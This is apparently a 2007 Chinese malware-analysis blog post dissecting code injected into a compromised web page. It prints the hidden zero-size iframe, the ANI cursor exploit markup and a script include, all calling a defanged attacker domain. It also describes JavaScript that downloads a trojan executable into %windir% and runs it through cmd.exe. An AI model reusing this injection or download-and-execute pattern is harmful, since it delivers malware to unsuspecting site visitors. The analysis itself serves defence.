endurer 原创
2007-04-29 第1版
植入的代码为:
/---
<iframe src=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htm width=0 height=0>
---/
kehu0739.htm的内容所用代码为US-ASCII。
到 http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序 解密后得到的内容包含代码:
/---
<DIV id=new_content_jp style="DISPLAY: none">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39a.jpg')">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39b.jpg')"></DIV></DIV></DIV>
<SCRIPT language=javascript src="hxxp://www.1**8d*m***m.com/wangma/39.js"></SCRIPT>
<iframe src=hxxp://www.1**8d*m***m.com/wangma/061439.htm width=0 height=0></iframe>
---/
hxxp://www.1**8d*m***m.com/wangma/39a.jpg(Kaspersky 报为 Exploit.Win32.ImG-ANI.ac)和 39b.jpg 利用 ANI漏洞 下载Hxxp://1**8d*m***m.com/xi*a***/kehu0739.exe
文件说明符 : D:/test/kehu0739.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-29 17:32:50
修改时间 : 2007-4-29 17:38:32
访问时间 : 2007-4-29 17:40:1
大小 : 16603 字节 16.219 KB
MD5 : defe53aaf22ed8273236c45b562f2628
UpackByDwing
Kaspersky 报为 Trojan-Downloader.Win32.Delf.bho。
hxxp://www.1**8d*m***m.com/wangma/39.js
每隔300毫秒执行自定义函数checkIE(),checkIE()检测IE版本,并写入代码
/---
<div style=/"cursor: url(/'hxxp://www.1**8d*m***m.com/wangma/39a.jpg/')/"><div style=/"cursor: url(/'hxxp://www.1**8d*m***m.com/wangma/39b.jpg/')/">
---/
hxxp://www.1**8d*m***m.com/wangma/39a.jpg 和 39b.jpg(Kaspersky 均报为 Exploit.Win32.ImG-ANI.ac)同样是利用ANI漏洞下载 kehu0739.exe。
hxxp://www.1**8d*m***m.com/wangma/061439.htm 内容所用代码为US-ASCII。
解密后的内容为Javascript脚本代码,功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 kehu0739.exe,保存到%windir%,文件名为 rising****.exe,其中****为 数字,由自定义函数:
/---
function fk(n){var number = Math.random()*n;
return Math.round(number)+'.exe';}
---/
生成。然后通过 Shell.Application 对象Q 的 ShellExecute 方法 执行命令: %windir%/system32/cmd.exe /c %windir%/rising****.exe 来运行。